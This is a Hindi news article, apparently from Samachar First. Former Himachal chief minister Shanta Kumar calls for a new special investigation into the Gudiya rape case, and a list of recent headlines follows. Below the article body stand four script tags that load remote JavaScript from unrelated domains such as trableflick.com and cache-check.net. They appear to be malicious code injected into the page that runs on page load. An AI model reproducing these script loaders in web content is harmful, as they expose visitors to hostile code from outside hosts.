गुड़िया के परिजनों को काटने पड़ रहे कोर्ट के चक्कर, दोबारा की जाए मामले की जांचः शांता कुमार

<p>पूर्व मुख्यमंत्री शांता कुमार ने महिला सुरक्षा और देश में बेटियों के प्रति बढ़ रहे अपराधों को लेकर चिंता व्यक्त की है। उन्होंने कहा कि दिल्ली में निर्भया और हिमाचल के कोटखाई में गुड़िया जैसे शर्मनाक कांड के बाद पूरे भारत में बेटियों के साथ बलात्कार का अत्याचार प्रतिदिन बढ़ता जा रहा है। पूरे देश के लिए इससे अधिक शर्म की और कोई बात नहीं हो सकती। गुडिया का पूरा परिवार विवश होकर अदालतों के चक्कर लगा रहा है। पूरा परिवार और गांव के लोग बड़े विश्वास के साथ यह कह रहे हैं कि गुड़िया के असली अपराधी आज भी खुलेआम घूम रहे हैं।</p>

<p>उन्होंने मुख्यमंत्री जयराम ठाकुर से विशेष आग्रह किया कि गुड़िया के परिजनों के दिल की पीड़ा को समझ कर एक बार न्याय दिलवाने की एक और कोशिश सरकार अवश्य करे। भले ही इस मामले में सीबीआई भी खाली हाथ लौट गई थी। अनुमान यह है कि पुलिस के बड़े अधिकारियों ने किसी बड़े नेता के कहने पर सबूतों को इतने वैज्ञानिक तरीके से खत्म किया कि सीबीआई को भी कुछ हाथ न लगा। अपराध विज्ञान का यह सिद्धान्त है कि हर अपराध अपने पीछे कोई निशानी अवश्य छोड़ता है और उसकी तलाश करने वाला चाहिये।</p>

<p>सरकार एक बार उन सब कथित अपराधियों को पकड़ कर सभी संभव सच्चाई का पता लगाने की कोशिश करे। उस परिवार को न्याय दिलवाना भी आवश्यक है। इतना ही अधिक आवश्यक यह भी है कि उन्हें यह भरोसा हो जाए कि उनकी अपनी प्रदेश सरकार ने सभी संभव प्रयत्न कर लिये। उन्होंने सुझाव दिया है कि सरकार अत्यन्त योग्य ईमानदार कुछ अवकाश प्राप्त और कुछ वर्तमान पुलिस अधिकारियों की एक विशेष जांच समिति का गठन करके और उस परिवार को न्याय दिलवाये। शांता कुमार ने गुड़िया परिवार को विश्वास दिलाया कि पूरे हिमाचल की जनता उनके साथ है।</p>

<p><img src=”/media/gallery/images/image(1366).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1602747260665″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

5 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

5 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

6 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

6 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

7 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

7 hours ago